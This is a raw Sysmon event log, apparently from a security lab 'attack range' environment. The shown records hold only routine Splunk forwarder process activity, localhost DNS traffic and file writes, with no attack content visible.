10341000x800000000000000043990Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-17D1-629A-0F07-000000006002}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043989Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.031{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D1-629A-0F07-000000006002}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043988Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.032{0A5DF930-17D1-629A-0F07-000000006002}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000205141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-53186-false127.0.0.1-53domain 354300x8000000000000000205140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:47.180{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53186- 10341000x800000000000000044030Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D2-629A-1107-000000006002}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044029Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044028Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044027Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044026Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044025Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044024Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044023Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044022Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044021Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044020Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-17D2-629A-1107-000000006002}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044019Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.953{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D2-629A-1107-000000006002}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044018Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.954{0A5DF930-17D2-629A-1107-000000006002}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044017Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.438{0A5DF930-17D2-629A-1007-000000006002}37921944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044016Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.406{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=EEC24222126A6E145C76B7380B0D22D6,SHA256=B7D6925BEBBC890A2EE2D21D592878354EACD3731603766C33E52C1D4367FA60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044015Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.312{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=219D51940A6143EEFAD4DD59ECC1508D,SHA256=12B97F206775C165C46A463A18FA760F5FB562180F4C60DE6647C24F1228B2D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044014Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D2-629A-1007-000000006002}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044013Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044012Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044011Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044010Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044009Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044008Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044007Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044006Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 